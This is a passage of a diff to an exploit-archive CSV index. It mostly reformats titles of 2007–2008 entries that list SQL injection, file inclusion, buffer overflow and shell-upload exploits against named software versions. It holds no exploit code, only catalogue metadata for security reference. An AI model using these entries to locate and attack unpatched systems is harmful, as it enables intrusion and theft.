3.6.1p-PAM / 4.1-SUSE - Timing Attack Exploit",2007-02-13,"Marco Ivaldi",multiple,remote,0 @@ -3060,7 +3060,7 @@ id,file,description,date,author,platform,type,port 3391,platforms/windows/remote/3391.py,"Snort 2.6.1 DCE/RPC Preprocessor Remote Buffer Overflow Exploit",2007-03-01,"Trirat Puttaraksa",windows,remote,0 3392,platforms/windows/dos/3392.html,"DivX Web Player 1.3.0 - (npdivx32.dll) Remote Denial of Service",2007-03-01,shinnai,windows,dos,0 3393,platforms/php/webapps/3393.php,"phpMyFAQ 1.6.7 - SQL Injection / Command Execution Exploit",2007-03-01,elgCrew,php,webapps,0 -3394,platforms/multiple/dos/3394.php,"PHP 4 Userland ZVAL Reference Counter Overflow Exploit PoC",2007-03-01,"Stefan Esser",multiple,dos,0 +3394,platforms/multiple/dos/3394.php,"PHP 4 - Userland ZVAL Reference Counter Overflow Exploit PoC",2007-03-01,"Stefan Esser",multiple,dos,0 3395,platforms/windows/remote/3395.c,"WebMod 0.48 - (Content-Length) Remote Buffer Overflow Exploit PoC",2007-03-01,cybermind,windows,remote,0 3396,platforms/linux/dos/3396.php,"PHP 4.4.4 unserialize() ZVAL Reference Counter Overflow Exploit PoC",2007-03-02,"Stefan Esser",linux,dos,0 3397,platforms/windows/remote/3397.pl,"MailEnable Pro/Ent 2.37 - (APPEND) Remote Buffer Overflow Exploit",2007-03-02,mu-b,windows,remote,143 @@ -3169,7 +3169,7 @@ id,file,description,date,author,platform,type,port 3503,platforms/php/webapps/3503.txt,"MPM Chat 2.5 - (view.php logi) Local File Inclusion",2007-03-17,GoLd_M,php,webapps,0 3504,platforms/php/webapps/3504.pl,"Active PHP Bookmark Notes 0.2.5 - Remote File Inclusion Exploit",2007-03-17,GoLd_M,php,webapps,0 3505,platforms/php/webapps/3505.php,"Net Portal Dynamic System (NPDS) 5.10 - Remote Code Execution",2007-03-18,DarkFig,php,webapps,0 -3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 +3506,platforms/php/webapps/3506.htm,"Guestbara 1.2 - Change Admin Login and Password Exploit",2007-03-18,Kacper,php,webapps,0 3507,platforms/php/webapps/3507.pl,"ScriptMagix FAQ Builder 2.0 - (index.php) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 3508,platforms/php/webapps/3508.txt,"Moodle 1.5.2 - (moodledata) Remote Session Disclosure",2007-03-18,xSh,php,webapps,0 3509,platforms/php/webapps/3509.pl,"ScriptMagix Jokes 2.0 - (index.php catid) SQL Injection Exploit",2007-03-18,ajann,php,webapps,0 @@ -3357,7 +3357,7 @@ id,file,description,date,author,platform,type,port 3698,platforms/linux/remote/3698.txt,"Kerberos 1.5.1 Kadmind Remote Root Buffer Overflow",2007-04-10,c0ntex,linux,remote,0 3699,platforms/php/webapps/3699.txt,"phpGalleryScript 1.0 - (init.gallery.php include_class) Remote File Inclusion",2007-04-10,anonymous,php,webapps,0 3700,platforms/php/webapps/3700.txt,"Weatimages 1.7.1 - ini[langpack] Remote File Inclusion",2007-04-10,Co-Sarper-Der,php,webapps,0 -3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 +3701,platforms/php/webapps/3701.txt,"Crea-Book 1.0 - Admin Access Bypass / DB Disclosure / Code Execution",2007-04-10,Xst3nZ,php,webapps,0 3702,platforms/php/webapps/3702.php,"InoutMailingListManager 3.1 - Remote Command Execution Exploit",2007-04-10,BlackHawk,php,webapps,0 3703,platforms/php/webapps/3703.txt,"Joomla/Mambo Component Taskhopper 1.1 - Remote File Inclusion",2007-04-10,"Cold Zero",php,webapps,0 3704,platforms/php/webapps/3704.txt,"pl-php beta 0.9 - Multiple Vulnerabilities",2007-04-10,Omni,php,webapps,0 @@ -3506,7 +3506,7 @@ id,file,description,date,author,platform,type,port 3848,platforms/php/webapps/3848.txt,"workbench 0.11 - (header.php path) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 3849,platforms/php/webapps/3849.txt,"XOOPS Flashgames Module 1.0.1 - SQL Injection",2007-05-04,"Mehmet Ince",php,webapps,0 3850,platforms/php/webapps/3850.php,"RunCMS 1.5.2 - (debug_show.php) SQL Injection Exploit",2007-05-04,rgod,php,webapps,0 -3851,platforms/multiple/dos/3851.c,"Multiple vendors ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 +3851,platforms/multiple/dos/3851.c,"Multiple vendors - ZOO file decompression Infinite Loop DoS PoC",2007-05-04,Jean-Sébastien,multiple,dos,0 3852,platforms/php/webapps/3852.txt,"PMECMS 1.0 - config[pathMod] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3853,platforms/php/webapps/3853.txt,"Persism CMS 0.9.2 - system[path] Remote File Inclusion",2007-05-04,GoLd_M,php,webapps,0 3854,platforms/php/webapps/3854.txt,"PHP TopTree BBS 2.0.1a (right_file) Remote File Inclusion",2007-05-04,kezzap66345,php,webapps,0 @@ -3609,9 +3609,9 @@ id,file,description,date,author,platform,type,port 3953,platforms/php/webapps/3953.txt,"SunLight CMS 5.3 - (root) Remote File Inclusion",2007-05-19,"Mehmet Ince",php,webapps,0 3954,platforms/windows/remote/3954.py,"Rational Software Hidden Administrator 1.7 - Auth Bypass Exploit",2007-05-19,"Ahmed Siddiqui",windows,remote,69 3955,platforms/php/webapps/3955.py,"Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Exploit",2007-05-20,NeoMorphS,php,webapps,0 -3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends 4.21 Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 +3956,platforms/php/webapps/3956.php,"AlstraSoft E-Friends 4.21 - Admin Session Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 3957,platforms/php/webapps/3957.php,"AlstraSoft Live Support 1.21 - Admin Credential Retrieve Exploit",2007-05-20,BlackHawk,php,webapps,0 -3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro 3.25 Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 +3958,platforms/php/webapps/3958.php,"AlstraSoft Template Seller Pro 3.25 - Admin Password Change Exploit",2007-05-20,BlackHawk,php,webapps,0 3959,platforms/php/webapps/3959.php,"AlstraSoft Template Seller Pro 3.25 - Remote Code Execution Exploit",2007-05-20,BlackHawk,php,webapps,0 3960,platforms/php/webapps/3960.php,"WordPress 2.1.3 - admin-ajax.php SQL Injection Blind Fishing Exploit",2007-05-21,waraxe,php,webapps,0 3961,platforms/windows/remote/3961.html,"LeadTools Raster Variant - (LTRVR14e.dll) Remote File Overwrite Exploit",2007-05-21,shinnai,windows,remote,0 @@ -3659,7 +3659,7 @@ id,file,description,date,author,platform,type,port 4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0 4004,platforms/php/webapps/4004.php,"Inout Search Engine - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0 4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 - (live_status.lib.php ROOT) Remote File Inclusion",2007-05-29,"ThE TiGeR",php,webapps,0 -4006,platforms/php/webapps/4006.php,"Pheap 2.0 Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 +4006,platforms/php/webapps/4006.php,"Pheap 2.0 - Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0 4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 - (tr) SQL Injection",2007-05-30,BAHADIR,asp,webapps,0 4008,platforms/windows/remote/4008.html,"Zenturi ProgramChecker ActiveX File Download/Overwrite Exploit",2007-05-30,shinnai,windows,remote,0 4009,platforms/windows/dos/4009.html,"EDraw Office Viewer Component Denial of Service",2007-05-30,shinnai,windows,dos,0 @@ -3709,7 +3709,7 @@ id,file,description,date,author,platform,type,port 4055,platforms/php/webapps/4055.htm,"PHP Real Estate Classifieds Remote File Inclusion Exploit",2007-06-09,"not sec group",php,webapps,0 4056,platforms/windows/dos/4056.html,"Internet Download Accelerator 5.2 - Remote Buffer Overflow PoC",2007-06-09,DeltahackingTEAM,windows,dos,0 4057,platforms/asp/webapps/4057.txt,"GeometriX Download Portal - (down_indir.asp id) SQL Injection",2007-06-09,CyberGhost,asp,webapps,0 -4058,platforms/windows/dos/4058.py,"Ace-FTP Client 1.24a Remote Buffer Overflow PoC",2007-06-10,n00b,windows,dos,0 +4058,platforms/windows/dos/4058.py,"Ace-FTP Client 1.24a - Remote Buffer Overflow PoC",2007-06-10,n00b,windows,dos,0 4059,platforms/php/webapps/4059.txt,"Link Request Contact Form 3.4 - Remote Code Execution",2007-06-11,CorryL,php,webapps,0 4060,platforms/windows/remote/4060.html,"TEC-IT TBarCode - OCX ActiveX Remote Arbitrary File Overwrite Exploit",2007-06-12,shinnai,windows,remote,0 4061,platforms/windows/remote/4061.html,"Safari 3 for Windows Beta - Remote Command Execution PoC",2007-06-12,"Thor Larholm",windows,remote,0 @@ -3866,7 +3866,7 @@ id,file,description,date,author,platform,type,port 4217,platforms/windows/remote/4217.html,"LinkedIn Toolbar 3.0.2.1098 - Remote Buffer Overflow Exploit",2007-07-24,"Jared DeMott",windows,remote,0 4218,platforms/windows/local/4218.php,"PHP 5.2.3 - Win32std ext. safe_mode/disable_functions Protections Bypass",2007-07-24,shinnai,windows,local,0 4219,platforms/php/webapps/4219.txt,"Confixx Pro 3.3.1 - (saveserver.php) Remote File Inclusion",2007-07-24,"H4 / XPK",php,webapps,0 -4220,platforms/php/webapps/4220.pl,"Entertainment CMS (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 +4220,platforms/php/webapps/4220.pl,"Entertainment CMS - (Local Inclusion) Remote Command Execution Exploit",2007-07-24,Kw3[R]Ln,php,webapps,0 4221,platforms/php/webapps/4221.txt,"Article Directory - (index.php page) Remote File Inclusion",2007-07-24,mozi,php,webapps,0 4222,platforms/windows/remote/4222.c,"Windows RSH daemon 1.7 - Remote Buffer Overflow Exploit",2007-07-24,"Joey Mengele",windows,remote,514 4223,platforms/windows/remote/4223.pl,"IPSwitch IMail Server 2006 - SEARCH Remote Stack Overflow Exploit",2007-07-25,ZhenHan.Liu,windows,remote,143 @@ -4111,7 +4111,7 @@ id,file,description,date,author,platform,type,port 4463,platforms/php/webapps/4463.txt,"integramod nederland 1.4.2 - Remote File Inclusion",2007-09-27,"Mehmet Ince",php,webapps,0 4464,platforms/php/webapps/4464.txt,"PhFiTo 1.3.0 - (SRC_PATH) Remote File Inclusion",2007-09-28,w0cker,php,webapps,0 4465,platforms/php/webapps/4465.txt,"public media manager 1.3 - Remote File Inclusion",2007-09-28,0in,php,webapps,0 -4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 +4466,platforms/php/webapps/4466.php,"Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Exploit",2007-09-28,InATeam,php,webapps,0 4467,platforms/php/webapps/4467.pl,"MDPro 1.0.76 - SQL Injection Exploit",2007-09-29,undefined1_,php,webapps,0 4468,platforms/windows/remote/4468.html,"Tor < 0.1.2.16 ControlPort Remote Rewrite Exploit",2007-09-29,elgCrew,windows,remote,0 4469,platforms/php/webapps/4469.txt,"Mambo Component Mambads 1.5 - SQL Injection",2007-09-29,Sniper456,php,webapps,0 @@ -4168,7 +4168,7 @@ id,file,description,date,author,platform,type,port 4520,platforms/php/webapps/4520.txt,"PicoFlat CMS 0.4.14 - index.php Remote File Inclusion",2007-10-11,0in,php,webapps,0 4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion",2007-10-11,mdx,php,webapps,0 4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0 -4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 +4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 - Newsletter Module SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0 4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion",2007-10-12,"Mehmet Ince",php,webapps,0 4525,platforms/php/webapps/4525.pl,"TikiWiki 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0 4526,platforms/windows/remote/4526.html,"PBEmail 7 - ActiveX Edition Insecure Method Exploit",2007-10-12,Katatafish,windows,remote,0 @@ -4203,7 +4203,7 @@ id,file,description,date,author,platform,type,port 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion",2007-10-22,GoLd_M,php,webapps,0 4556,platforms/multiple/remote/4556.txt,"LiteSpeed Web Server 3.2.3 - Remote Source Code Disclosure",2007-10-22,Tr3mbl3r,multiple,remote,0 4557,platforms/php/webapps/4557.txt,"Simple PHP Blog (sphpblog) 0.5.1 - Multiple Vulnerabilities",2007-10-22,DarkFig,php,webapps,0 -4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script (index.php) 1.0 - Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0 +4558,platforms/php/webapps/4558.txt,"InstaGuide Weather Script 1.0 - (index.php) Local File Inclusion",2007-10-22,"BorN To K!LL",php,webapps,0 4559,platforms/multiple/dos/4559.txt,"Mozilla Firefox 2.0.0.7 - Remote Denial of Service",2007-10-22,BugReport.IR,multiple,dos,0 4560,platforms/multiple/dos/4560.pl,"DNS Recursion Bandwidth Amplification - Denial of Service PoC",2007-10-23,ShadowHatesYou,multiple,dos,0 4561,platforms/php/webapps/4561.txt,"Flatnuke 3 - Remote Command Execution / Privilege Escalation",2007-10-23,KiNgOfThEwOrLd,php,webapps,0 @@ -4221,7 +4221,7 @@ id,file,description,date,author,platform,type,port 4573,platforms/windows/remote/4573.py,"IBM Tivoli Storage Manager 5.3 - Express CAD Service BoF Exploit",2007-10-27,muts,windows,remote,1581 4574,platforms/windows/remote/4574.pl,"IBM Lotus Domino 7.0.2FP1 IMAP4 Server LSUB Command Exploit",2007-10-27,FistFuXXer,windows,remote,143 4575,platforms/php/webapps/4575.txt,"GoSamba 1.0.1 - (include_path) Multiple Remote File Inclusion",2007-10-27,GoLd_M,php,webapps,0 -4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 +4576,platforms/php/webapps/4576.txt,"JobSite Professional 2.0 - file.php SQL Injection",2007-10-28,ZynbER,php,webapps,0 4577,platforms/php/webapps/4577.txt,"CaupoShop Pro 2.x - (action) Remote File Inclusion",2007-10-28,mozi,php,webapps,0 4578,platforms/asp/webapps/4578.txt,"emagiC CMS.Net 4.0 - (emc.asp) SQL Injection",2007-10-28,hak3r-b0y,asp,webapps,0 4579,platforms/windows/remote/4579.html,"GOM Player 2.1.6.3499 - (GomWeb3.dll 1.0.0.12) Remote Overflow Exploit",2007-10-29,rgod,windows,remote,0 @@ -4236,13 +4236,13 @@ id,file,description,date,author,platform,type,port 4588,platforms/php/webapps/4588.txt,"phpFaber URLInn 2.0.5 - (dir_ws) Remote File Inclusion",2007-10-30,BiNgZa,php,webapps,0 4589,platforms/php/webapps/4589.htm,"PHP-AGTC membership system 1.1a Remote Add Admin Exploit",2007-10-30,0x90,php,webapps,0 4591,platforms/php/webapps/4591.txt,"ModuleBuilder 1.0 - (file) Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 -4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 +4592,platforms/php/webapps/4592.txt,"ISPworker 1.21 - download.php Remote File Disclosure",2007-10-31,GoLd_M,php,webapps,0 4593,platforms/php/webapps/4593.txt,"WordPress Plugin BackUpWordPress 0.4.2b - Remote File Inclusion",2007-11-01,S.W.A.T.,php,webapps,0 4594,platforms/windows/remote/4594.html,"SonicWall SSL-VPN NeLaunchCtrl ActiveX Control Remote Exploit",2007-11-01,krafty,windows,remote,0 4595,platforms/php/webapps/4595.txt,"Synergiser 1.2 RC1 - Local File Inclusion / Full Path Disclosure",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4596,platforms/php/webapps/4596.txt,"Scribe 0.2 - Remote PHP Code Execution",2007-11-02,KiNgOfThEwOrLd,php,webapps,0 4597,platforms/php/webapps/4597.txt,"DM Guestbook 0.4.1 - Multiple Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 -4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 +4598,platforms/windows/remote/4598.html,"EDraw Flowchart ActiveX Control 2.0 - Insecure Method Exploit",2007-11-02,shinnai,windows,remote,0 4599,platforms/php/webapps/4599.txt,"Ax Developer CMS 0.1.1 - (index.php module) Local File Inclusion",2007-11-02,GoLd_M,php,webapps,0 4600,platforms/linux/dos/4600.py,"Firefly Media Server 0.2.4 - Remote Denial of Service",2007-11-02,nnp,linux,dos,0 4601,platforms/multiple/dos/4601.txt,"Ubuntu 6.06 DHCPd - Remote Denial of Service",2007-11-02,RoMaNSoFt,multiple,dos,0 @@ -4257,7 +4257,7 @@ id,file,description,date,author,platform,type,port 4610,platforms/windows/dos/4610.html,"Viewpoint Media Player for IE 3.2 - Remote Stack Overflow PoC",2007-11-06,shinnai,windows,dos,0 4611,platforms/php/webapps/4611.txt,"jPORTAL 2 mailer.php SQL Injection",2007-11-06,Kacper,php,webapps,0 4612,platforms/aix/local/4612.py,"IBM AIX 5.3.0 - setlocale() Local Privilege Escalation Exploit",2007-11-07,"Thomas Pollet",aix,local,0 -4613,platforms/windows/dos/4613.html,"Adobe Shockwave ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0 +4613,platforms/windows/dos/4613.html,"Adobe Shockwave - ShockwaveVersion() Stack Overflow PoC",2007-11-08,Elazar,windows,dos,0 4614,platforms/php/webapps/4614.txt,"jPORTAL 2.3.1 articles.php SQL Injection",2007-11-09,Alexsize,php,webapps,0 4615,platforms/multiple/dos/4615.txt,"MySQL 5.0.45 - (Alter) Denial of Service",2007-11-09,"Kristian Hermansen",multiple,dos,0 4616,platforms/windows/remote/4616.pl,"Microsoft Internet Explorer - TIF/TIFF Code Execution (MS07-055)",2007-11-11,grabarz,windows,remote,0 @@ -4327,7 +4327,7 @@ id,file,description,date,author,platform,type,port 4680,platforms/php/webapps/4680.txt,"LearnLoop 2.0beta7 - (sFilePath) Remote File Disclosure",2007-11-29,GoLd_M,php,webapps,0 4681,platforms/php/webapps/4681.txt,"ftp admin 0.1.0 - (LFI/XSS/ab) Multiple Vulnerabilities",2007-11-29,Omni,php,webapps,0 4682,platforms/windows/dos/4682.c,"Windows Media Player AIFF Divide By Zero Exception DoS PoC",2007-11-29,"Gil-Dong / Woo-Chi",windows,dos,0 -4683,platforms/windows/dos/4683.py,"RealPlayer 11 Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0 +4683,platforms/windows/dos/4683.py,"RealPlayer 11 - Malformed AU File Denial of Service",2007-12-01,NtWaK0,windows,dos,0 4684,platforms/php/webapps/4684.txt,"tellmatic 1.0.7 - Multiple Remote File Inclusion",2007-12-01,ShAy6oOoN,php,webapps,0 4685,platforms/php/webapps/4685.txt,"Rayzz Script 2.0 - Remote File Inclusion / Local File Inclusion",2007-12-01,Crackers_Child,php,webapps,0 4686,platforms/php/webapps/4686.txt,"phpBB Garage 1.2.0 Beta3 - SQL Injection",2007-12-03,maku234,php,webapps,0 @@ -4358,7 +4358,7 @@ id,file,description,date,author,platform,type,port 4711,platforms/php/webapps/4711.txt,"falt4 CMS rc4 10.9.2007 - Multiple Vulnerabilities",2007-12-10,"H-Security Labs",php,webapps,0 4712,platforms/php/webapps/4712.txt,"falcon CMS 1.4.3 - (RFI/XSS) Multiple Vulnerabilities",2007-12-10,MhZ91,php,webapps,0 4713,platforms/windows/remote/4713.txt,"barracudadrive 3.7.2 - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 -4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 +4714,platforms/php/webapps/4714.pl,"MonAlbum 0.87 - Upload Shell / Password Grabber Exploit",2007-12-10,v0l4arrra,php,webapps,0 4715,platforms/windows/remote/4715.txt,"badblue 2.72b - Multiple Vulnerabilities",2007-12-10,"Luigi Auriemma",windows,remote,0 4716,platforms/windows/dos/4716.html,"Online Media Technologies AVSMJPEGFILE.DLL 1.1 - Remote BoF PoC",2007-12-11,shinnai,windows,dos,0 4717,platforms/windows/dos/4717.py,"Simple HTTPD 1.41 - (/aux) Remote Denial of Service",2007-12-11,shinnai,windows,dos,0 @@ -4375,7 +4375,7 @@ id,file,description,date,author,platform,type,port 4728,platforms/php/webapps/4728.txt,"Mms Gallery PHP 1.0 - (id) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4729,platforms/php/webapps/4729.txt,"xml2owl 0.1.1 - (filedownload.php) Remote File Disclosure",2007-12-13,GoLd_M,php,webapps,0 4730,platforms/asp/webapps/4730.txt,"hosting controller 6.1 hot fix 3.3 - Multiple Vulnerabilities",2007-12-13,BugReport.IR,asp,webapps,0 -4731,platforms/php/webapps/4731.php,"Adult Script 1.6 Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 +4731,platforms/php/webapps/4731.php,"Adult Script 1.6 - Unauthorized Administrative Access Exploit",2007-12-13,Liz0ziM,php,webapps,0 4732,platforms/linux/dos/4732.c,"Samba 3.0.27a send_mailslot() Remote Buffer Overflow PoC",2007-12-14,x86,linux,dos,0 4733,platforms/php/webapps/4733.txt,"123tkShop 0.9.1 - Remote Authentication Bypass",2007-12-14,"Michael Brooks",php,webapps,0 4734,platforms/php/webapps/4734.txt,"Anon Proxy Server 0.1000 - Remote Command Execution",2007-12-14,"Michael Brooks",php,webapps,0 @@ -4396,7 +4396,7 @@ id,file,description,date,author,platform,type,port 4749,platforms/windows/local/4749.c,"Rosoft Media Player 4.1.7 - (.m3u) Stack Overflow Exploit",2007-12-18,devcode,windows,local,0 4750,platforms/php/webapps/4750.txt,"phpMyRealty 1.0.x - (search.php type) SQL Injection",2007-12-18,Koller,php,webapps,0 4751,platforms/windows/local/4751.pl,"jetAudio 7.0.5 COWON Media Center MP4 - Stack Overflow Exploit",2007-12-18,"SYS 49152",windows,local,0 -4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 Bypass Upload Shell From Your Profile",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 +4753,platforms/php/webapps/4753.txt,"Dokeos 1.8.4 - Bypass Upload Shell From Your Profile",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g - logurl() Remote Buffer Overflow Exploit (Win32) (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128 4755,platforms/php/webapps/4755.txt,"PhpMyDesktop/Arcade 1.0 Final - (phpdns_basedir) Remote File Inclusion",2007-12-18,RoMaNcYxHaCkEr,php,webapps,0 4756,platforms/linux/local/4756.c,"Linux Kernel < 2.6.11.5 - Bluetooth Stack Local Root Exploit",2007-12-18,Backdoored,linux,local,0 @@ -4422,7 +4422,7 @@ id,file,description,date,author,platform,type,port 4776,platforms/php/webapps/4776.txt,"MMSLamp (idpro) SQL Injection",2007-12-23,x0kster,php,webapps,0 4777,platforms/php/webapps/4777.txt,"WebSihirbazi 5.1.1 - (pageid) SQL Injection",2007-12-24,bypass,php,webapps,0 4778,platforms/php/webapps/4778.txt,"MeGaCheatZ 1.1 - Multiple SQL Injection",2007-12-24,MhZ91,php,webapps,0 -4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 +4779,platforms/php/webapps/4779.php,"CuteNews 1.4.5 - Admin Password md5 Hash Fetching Exploit",2007-12-24,waraxe,php,webapps,0 4780,platforms/php/webapps/4780.txt,"ThemeSiteScript 1.0 - (index.php loadadminpage) Remote File Inclusion",2007-12-24,Koller,php,webapps,0 4781,platforms/php/webapps/4781.php,"Jupiter 1.1.5ex - Privileges Escalation Exploit",2007-12-24,BugReport.IR,php,webapps,0 4782,platforms/php/webapps/4782.txt,"Agares PhpAutoVideo 2.21 - Remote/Local File Inclusion",2007-12-24,MhZ91,php,webapps,0 @@ -4470,7 +4470,7 @@ id,file,description,date,author,platform,type,port 4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0 4826,platforms/php/webapps/4826.pl,"WebPortal CMS 0.6.0 - (index.php m) SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0 4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade 2.1.3 - SQL Injection",2007-12-31,Houssamix,php,webapps,0 -4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 +4828,platforms/php/webapps/4828.txt,"AGENCY4NET WEBFTP 1 - download2.php File Disclosure",2008-01-01,GoLd_M,php,webapps,0 4829,platforms/windows/dos/4829.html,"DivX Player 6.6.0 - ActiveX SetPassword() Denial of Service PoC",2008-01-02,anonymous,windows,dos,0 4830,platforms/php/webapps/4830.txt,"ClipShare - (uprofile.php UID) SQL Injection",2008-01-02,Krit,php,webapps,0 4831,platforms/php/webapps/4831.txt,"MyPHP Forum 3.0 - (Final) SQL Injection",2008-01-03,The:Paradox,php,webapps,0 @@ -4531,7 +4531,7 @@ id,file,description,date,author,platform,type,port 4887,platforms/php/webapps/4887.htm,"DigitalHive 2.0 RC2 - (user_id) SQL Injection Exploit",2008-01-11,j0j0,php,webapps,0 4888,platforms/php/webapps/4888.txt,"DomPHP 0.81 - (index.php cat) SQL Injection",2008-01-11,MhZ91,php,webapps,0 4889,platforms/php/webapps/4889.txt,"vcart 3.3.2 - Multiple Remote File Inclusion",2008-01-11,k1n9k0ng,php,webapps,0 -4890,platforms/php/webapps/4890.txt,"AJchat 0.10 unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 +4890,platforms/php/webapps/4890.txt,"AJchat 0.10 - unset() bug SQL Injection",2008-01-11,"Eugene Minaev",php,webapps,0 4891,platforms/php/webapps/4891.php,"Docebo 3.5.0.3 - (lib.regset.php/non-blind) SQL Injection Exploit",2008-01-11,rgod,php,webapps,0 4892,platforms/windows/local/4892.py,"Microsoft Visual InterDev 6.0 - (SP6) .sln File Local Buffer Overflow Exploit",2008-01-11,shinnai,windows,local,0 4893,platforms/linux/dos/4893.c,"Linux Kernel 2.6.21.1 - IPv6 Jumbo Bug Remote Denial of Service",2008-01-11,"Clemens Kurtenbach",linux,dos,0 @@ -4599,7 +4599,7 @@ id,file,description,date,author,platform,type,port 4955,platforms/php/webapps/4955.txt,"Lama Software 14.12.2007 - Multiple Remote File Inclusion",2008-01-21,QTRinux,php,webapps,0 4956,platforms/php/webapps/4956.txt,"AlstraSoft Forum Pay Per Post Exchange 2.0 - SQL Injection",2008-01-21,t0pP8uZz,php,webapps,0 4957,platforms/php/webapps/4957.txt,"MoinMoin 1.5.x - MOIND_ID cookie Bug Remote Exploit",2008-01-21,nonroot,php,webapps,0 -4958,platforms/php/webapps/4958.txt,"aflog 1.01 comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0 +4958,platforms/php/webapps/4958.txt,"aflog 1.01 - comments.php XSS / SQL Injection",2008-01-22,shinmai,php,webapps,0 4959,platforms/windows/remote/4959.html,"HP Virtual Rooms WebHPVCInstall Control Buffer Overflow Exploit",2008-01-22,Elazar,windows,remote,0 4960,platforms/php/webapps/4960.txt,"Easysitenetwork Recipe - (categoryid) SQL Injection",2008-01-22,S@BUN,php,webapps,0 4961,platforms/php/webapps/4961.php,"Coppermine Photo Gallery 1.4.14 - SQL Injection Exploit",2008-01-22,RST/GHC,php,webapps,0 @@ -4875,7 +4875,7 @@ id,file,description,date,author,platform,type,port 5235,platforms/windows/dos/5235.py,"MailEnable SMTP Service - VRFY/EXPN Command Buffer Overflow DoS",2008-03-11,ryujin,windows,dos,0 5236,platforms/php/webapps/5236.txt,"phpBB Mod FileBase (id) SQL Injection",2008-03-11,t0pP8uZz,php,webapps,0 5237,platforms/php/webapps/5237.txt,"Joomla Component ProductShowcase 1.5 - SQL Injection",2008-03-11,S@BUN,php,webapps,0 -5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0 +5238,platforms/windows/remote/5238.py,"Motorola Timbuktu Pro 8.6.5/8.7 - Path Traversal / Log Injection Exploit",2008-03-11,"Core Security",windows,remote,0 5239,platforms/php/webapps/5239.php,"Danneo CMS 0.5.1 - Remote Blind SQL Injection Exploit",2008-03-11,InATeam,php,webapps,0 5240,platforms/php/webapps/5240.htm,"QuickTalk Forum 1.6 - Remote Blind SQL Injection Exploit",2008-03-12,t0pP8uZz,php,webapps,0 5241,platforms/php/webapps/5241.txt,"XOOPS Module Gallery 0.2.2 - (gid) SQL Injection",2008-03-12,S@BUN,php,webapps,0 @@ -5003,7 +5003,7 @@ id,file,description,date,author,platform,type,port 